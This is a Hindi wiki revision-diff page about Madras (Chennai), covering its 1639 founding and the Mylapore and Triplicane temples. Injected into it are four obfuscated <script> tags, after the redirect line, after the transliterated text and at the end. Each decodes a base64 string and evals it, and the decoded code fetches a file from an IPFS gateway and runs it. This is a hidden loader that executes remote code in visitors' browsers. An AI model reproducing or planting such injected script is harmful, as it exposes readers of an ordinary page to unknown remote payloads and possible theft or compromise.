Difference between revisions of "मद्रास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 2: Line 2:
 
मद्रास का वर्तमान नाम [[चेन्नई]] है। सन 1639 ई. में [[ईस्ट इंडिया कंपनी]] के कर्मचारी फ़्रांसिस डे ने विजयनगर के राजा से कुछ भूमि लेकर इस नगर की स्थापना की थी। उस समय का बना हुआ क़िला अभी तक विद्यमान है। मद्रास के उपनगर मायलापुर में कपालीश्वर [[शिव]] का प्राचीन मंदिर है। मायलापुर का शाब्दिक अर्थ मयूरनगर है। पौराणिक जनश्रुति के अनुसार [[पार्वती]] ने [[मयूर]] का रूप धारण करके शिव जी की इस स्थान पर पूजा की थी। इसी कथा का अंकन इस मंदिर की मूर्तिकारी में है। मंदिर के पीछे एक पवित्र ताल है। ट्रिप्लीकेन में [[पार्थसारथी मंदिर चेन्नई|पार्थसारथी का मंदिर]] भी उल्लेखनीय है। मद्रास के स्थान पर प्राचीन समय में चैन्नापटम्  नामक ग्राम बसा हुआ था।
 
मद्रास का वर्तमान नाम [[चेन्नई]] है। सन 1639 ई. में [[ईस्ट इंडिया कंपनी]] के कर्मचारी फ़्रांसिस डे ने विजयनगर के राजा से कुछ भूमि लेकर इस नगर की स्थापना की थी। उस समय का बना हुआ क़िला अभी तक विद्यमान है। मद्रास के उपनगर मायलापुर में कपालीश्वर [[शिव]] का प्राचीन मंदिर है। मायलापुर का शाब्दिक अर्थ मयूरनगर है। पौराणिक जनश्रुति के अनुसार [[पार्वती]] ने [[मयूर]] का रूप धारण करके शिव जी की इस स्थान पर पूजा की थी। इसी कथा का अंकन इस मंदिर की मूर्तिकारी में है। मंदिर के पीछे एक पवित्र ताल है। ट्रिप्लीकेन में [[पार्थसारथी मंदिर चेन्नई|पार्थसारथी का मंदिर]] भी उल्लेखनीय है। मद्रास के स्थान पर प्राचीन समय में चैन्नापटम्  नामक ग्राम बसा हुआ था।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 13:13, 10 January 2011

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

madras ka vartaman nam chennee hai. san 1639 ee. mean eest iandiya kanpani ke karmachari fraansis de ne vijayanagar ke raja se kuchh bhoomi lekar is nagar ki sthapana ki thi. us samay ka bana hua qila abhi tak vidyaman hai. madras ke upanagar mayalapur mean kapalishvar shiv ka prachin mandir hai. mayalapur ka shabdik arth mayooranagar hai. pauranik janashruti ke anusar parvati ne mayoor ka roop dharan karake shiv ji ki is sthan par pooja ki thi. isi katha ka aankan is mandir ki moortikari mean hai. mandir ke pichhe ek pavitr tal hai. tripliken mean parthasarathi ka mandir bhi ullekhaniy hai. madras ke sthan par prachin samay mean chainnapatamh namak gram basa hua tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>